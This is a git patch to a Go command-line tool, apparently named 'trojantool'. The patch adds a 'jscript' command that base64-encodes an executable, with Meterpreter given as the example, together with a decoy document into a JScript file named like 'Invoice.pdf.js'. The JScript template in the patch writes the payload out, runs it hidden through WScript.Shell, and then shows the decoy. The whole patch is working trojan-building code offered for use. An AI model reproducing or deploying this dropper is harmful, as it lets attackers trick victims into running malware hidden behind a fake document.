From b3b35f60115c4ab3063745e0ea40f96d975a1de8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Johannes=20B=C3=BClow?= Date: Thu, 10 Aug 2023 21:53:50 +0200 Subject: [PATCH] JScript should work now --- cmd/jscript.go | 59 ++++++++++++++++++++++++++++++++++++++++++++---- cmd/jscript.gojs | 5 +++- 2 files changed, 58 insertions(+), 6 deletions(-) diff --git a/cmd/jscript.go b/cmd/jscript.go index 9040ca2..e45f88e 100644 --- a/cmd/jscript.go +++ b/cmd/jscript.go @@ -1,12 +1,11 @@ -/* -Copyright © 2023 NAME HERE -*/ package cmd import ( _ "embed" - "fmt" + "encoding/base64" "github.com/spf13/cobra" + "os" + "text/template" ) //go:embed jscript.gojs @@ -23,7 +22,57 @@ Example: trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe `, Run: func(cmd *cobra.Command, args []string) { - fmt.Println("jscript called") + type OutData struct { + Encoded string + EncodedDecoy string + } + + var outData OutData + tmpl := template.Must(template.New("").Parse(jscriptTmpl)) + if len(args) != 1 { + cmd.PrintErr("Please specify one Input file! \n") + _ = cmd.Help() + os.Exit(1) + } + input := args[0] + if input == "" { + cmd.PrintErr("You need to specify an input file!") + } + output, _ := cmd.Flags().GetString("output") + + content, err := os.ReadFile(input) + if err != nil { + cmd.PrintErrf("Could not read Input file: %s", err) + } + outData.Encoded = base64.StdEncoding.EncodeToString(content) + + decoy, err := cmd.Flags().GetString("decoy") + if err != nil { + cmd.PrintErrf("Could not get Decoy file: %s", err) + } + if decoy != "" { + decoyContent, err := os.ReadFile(decoy) + if err != nil { + cmd.PrintErrf("Could not get Decoy Content file: %s", err) + } + outData.EncodedDecoy = base64.StdEncoding.EncodeToString(decoyContent) + } + + outFile, err := os.Create(output) + if err != nil { + cmd.PrintErrf("Could not create output file: %s", err) + } + defer func(outFile *os.File) { + err := outFile.Close() + if err != nil { + + } + }(outFile) + err = tmpl.Execute(outFile, outData) + if err != nil { + cmd.PrintErrf("Could not create output file: %s", err) + } + }, } diff --git a/cmd/jscript.gojs b/cmd/jscript.gojs index 3fb1b48..fda1d13 100644 --- a/cmd/jscript.gojs +++ b/cmd/jscript.gojs @@ -8,6 +8,7 @@ var bytes = stream.Read(); var shell = new ActiveXObject("WScript.Shell"); shell.Run(bytes, 0, false); +{{if len .EncodedDecoy}} var stream2 = new ActiveXObject("ADODB.Stream"); stream.Type = 1; @@ -16,4 +17,6 @@ stream.Write(window.atob({{.EncodedDecoy}})); var bytes = stream.Read(); shell.Popup(bytes, 0, "Document", 0x40); -// vim: syntax=javascript \ No newline at end of file +{{end}} + +{{/* vim: syntax=javascript */}} \ No newline at end of file